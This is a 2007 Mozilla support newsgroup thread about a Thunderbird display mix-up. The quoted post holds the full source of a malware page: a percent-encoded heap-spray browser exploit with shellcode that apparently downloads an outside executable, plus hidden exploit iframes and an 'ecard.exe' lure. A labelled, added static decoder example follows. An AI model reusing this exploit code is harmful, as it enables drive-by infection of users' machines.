
Strange mix-up in Thunderbird


"Andrés M."

Jun 25, 2007, 9:58:35 AM
Hello,
This morning I opened Thunderbird and went to the m.s.firefox newsgroup.
I clicked first on the mail with subject "Could this exploit code from a
malware site affect Firefox?" and while the mail window was blank and
still loading I immediately clicked on the mail with subject "Really
really really annoying and persistent display problem...". Almost
instantly the latter mail was on screen. Then I clicked on the Back button
to see the first mail and what I got was a mix of the first half of the
first mail with the full content of the second mail (including header)
appended below. The resulting content is pasted at the end of this mail.
The header of the second mail may be a little different, I copied it
manually from an exported text file of the second mail. Look for the
word "unescaping" to reach the point where both mails got mixed.

I am unable to reproduce this strange event again, but it definitely
happened so I wonder if someone can take a look at it.

Andrés

-------------------------------------------------------------------------

Hello, I've accidentally entered a malware site by following an e-mail link
to www.duhymn.hk (be careful NOT to enter that site with a browser).
When I entered the site with Firefox 2.0.0.4, the browser immediately froze,
so I had to manually terminate it with the Task Manager (Windows XP).
Then I thought that it could be a malware site, so I tried to download
its main page outside any browser to avoid executing it again.

I got the following code from the "index.htm" page:
___

<html>
<body>
<script>
document.write(unescape("%3c%73%63%72%69%70%74%3e%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25
%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65
%25%75%30%30%34%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38
%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30%30%30%37%25%75%30%30%30%30%25%75%37%32
%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25%75%30
%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75
%31%33%65%38%25%75%30%30%30%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25
%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36%66%35%34%25%75%36%39%34%36
%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30
%30%25%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30
%36%61%25%75%30%30%36%61%25%75%30%39%65%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35
%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36%61%35%31%25%75
%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25
%75%65%38%30%30%25%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63
%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30%30%25%75%30%30%62%65%25%75%30%30%30
%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62%31
%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36
%32%36%39%25%75%36%31%37%32%25%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75
%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34%35%25%75%37%34%36%39%25
%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38
%25%75%37%30%37%34%25%75%32%66%33%61%25%75%37%32%32%66%25%75%37%34%36%36%25%75%37%35%36
%38%25%75%32%65%36%34%25%75%36%66%36%33%25%75%32%66%36%64%25%75%36%31%36%64%25%75%32%65
%36%65%25%75%37%38%36%35%25%75%30%30%36%35%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30
%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%36%30%30%30%25%75
%38%62%36%34%25%75%33%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25
%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25%75%30%38%35%62%25%75%64%61%38%39
%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33
%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30
%37%33%25%75%37%62%38%62%25%75%30%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30
%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25%75%31%33%31%65%25%75
%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25
%75%35%39%35%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62
%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63%31%30%37%25%75%30%32%65%30%25%75%37%33%38
%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25%75%38%35
%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32
%64%62%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75
%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37%32%35%30%25%75%36%33%36%66%25
%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30
%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%30%64%30%64%25%75%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65
%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73%75%62%73%74%72%69
%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20
%41%72%72%61%79%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69
%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69%6c%28%30%78%64%30%64%30%64%30%64%29%3b
%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73
%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d
%42%31%43%33%2d%30%44%45%37%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e
%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74%73%5b%30%5d%2e%63%72%65%61
%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63
%68%28%65%29%7b%7d%0a%3c%2f%73%63%72%69%70%74%3e"));
</script>
<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d
%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61
%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69
%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a
%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d
%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%73%74%79
%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%31%32%33%2e%68%74%6d%22%29
%7d%20%3c%2f%73%74%79%6c%65%3e%0a"));
</script>
We are currently testing a new browser feature. If you are not able to
view this ecard, please <a href="/ecard.exe">click here</a> to view in
its original format.
</body>
</html>
___

The fact that the code is obfuscated like this hints that it's a malware
site. After "unescaping" both encoded lines, I got the following code:
___

Path: border1.nntp.dca.giganews.com!nntp.giganews.com!postnews.google.com!p77g2000hsh.googlegroups.com!not-for-mail
Newsgroups: mozilla.support.firefox
Organization: http://groups.google.com
Lines: 18
Message-ID: <1182746345....@p77g2000hsh.googlegroups.com>
NNTP-Posting-Host: 72.142.180.124
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
X-Trace: posting.google.com 1182746346 30540 127.0.0.1 (25 Jun 2007 04:39:06 GMT)
X-Complaints-To: groups...@google.com
NNTP-Posting-Date: Mon, 25 Jun 2007 04:39:06 +0000 (UTC)
User-Agent: G2/1.0
X-HTTP-UserAgent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty),gzip(gfe),gzip(gfe)
Complaints-To: groups...@google.com
Injection-Info: p77g2000hsh.googlegroups.com; posting-host=72.142.180.124; posting-account=0SOUng0AAACu7zVOKRLT1jesEMn1KjB7
Bytes: 1747
Xref: number1.nntp.dca.giganews.com mozilla.support.firefox:58015

I'm running FF2 on Ubuntu and I've been struggling with a problem for a
while:

Randomly, pages will load (i.e. at the level of http) but the content
will not display. So for example I may be at one page, click a link,
see the progress bar indicate that all the data has been transferred,
but nothing happens.

It just sits there. By resizing my window the display WILL CHANGE
correctly, but only by doing that.

Please tell me someone has had this prob. This is such a pain in the
ass. I love this browser but it's killing me -- just killing me -- to
have to resize sometimes every flipping page load... *cries*...
*sobs*...

--lstewart
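
The pasted post mentions "unescaping" the encoded lines outside a browser. The following is an added example, not part of the original thread: a static decoder that peels `unescape("...")` layers without evaluating or rendering anything. The function names (`staticUnescape`, `extractEncoded`, `peelLayers`) are hypothetical and the sample input is constructed and benign.

```javascript
// Added example: statically peel legacy escape()/unescape() layers.
// Nothing here evaluates or renders the decoded text.

// Decode %XX and %uXXXX the way the legacy unescape() built-in does.
function staticUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (match, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Collect the string literal of every unescape("...") call. Whitespace inside
// the literal is dropped because mail wrapping splits it across lines.
function extractEncoded(text) {
  const found = [];
  const re = /unescape\(\s*"([^"]*)"\s*\)/g;
  let m;
  while ((m = re.exec(text)) !== null) found.push(m[1].replace(/\s+/g, ""));
  return found;
}

// Decode layer by layer until no unescape("...") call is left.
function peelLayers(text, maxDepth = 5) {
  const layers = [];
  let pending = extractEncoded(text);
  for (let depth = 1; pending.length > 0 && depth <= maxDepth; depth++) {
    const decoded = pending.map(staticUnescape);
    layers.push({ depth, decoded });
    pending = decoded.flatMap(extractEncoded);
  }
  return layers;
}

// Constructed, benign sample shaped like the page in the post: an outer
// %XX layer wrapping a script that holds an inner %uXXXX string.
const encodeAll = (s) => [...s].map(
  (c) => "%" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const INNER = '<script>x=unescape("%u0048%u0069");</script>';
const SAMPLE = '<script>\ndocument.write(unescape("' +
  encodeAll(INNER).replace(/(.{30})/g, "$1\n") + '"));\n</script>';

for (const layer of peelLayers(SAMPLE)) {
  // JSON.stringify keeps control and non-printable characters visible.
  console.log("layer", layer.depth, JSON.stringify(layer.decoded));
}
```

Run it with Node against a saved copy of the page text; the decoded layers are only printed as JSON strings, so nothing in them is ever interpreted as HTML or script.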


Nir

Jun 25, 2007, 1:25:20 PM
Andrés M. wrote:
> Hello, This morning I opened Thunderbird and went to the m.s.firefox
> newsgroup. I clicked first on the mail with subject "Could this
> exploit code from a malware site affect Firefox?" and while the mail
> window was blank and still loading I immediately clicked on the mail
> with subject "Really really really annoying and persistent display
> problem...". Almost instantly the latter mail was on screen. Then
> I clicked on the Back button to see the first mail and what I got was a
> mix of the first half of the first mail with the full content of the
> second mail (including header) appended below. The resulting content
> is pasted at the end of this mail. The header of the second mail may
> be a little different, I copied it manually from an exported text
> file of the second mail. Look for the word "unescaping" to reach the
> point where both mails got mixed.
>
> I am unable to reproduce this strange event again, but it definitely
> happened so I wonder if someone can take a look at it.

Either an extension is causing this -
"https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
or it's the theme you are using, which is misbehaving -
"https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
"https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"

"Andrés M."

Jun 25, 2007, 1:44:04 PM

Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.

Thanks for your reply, but add-ons are certainly not the cause.
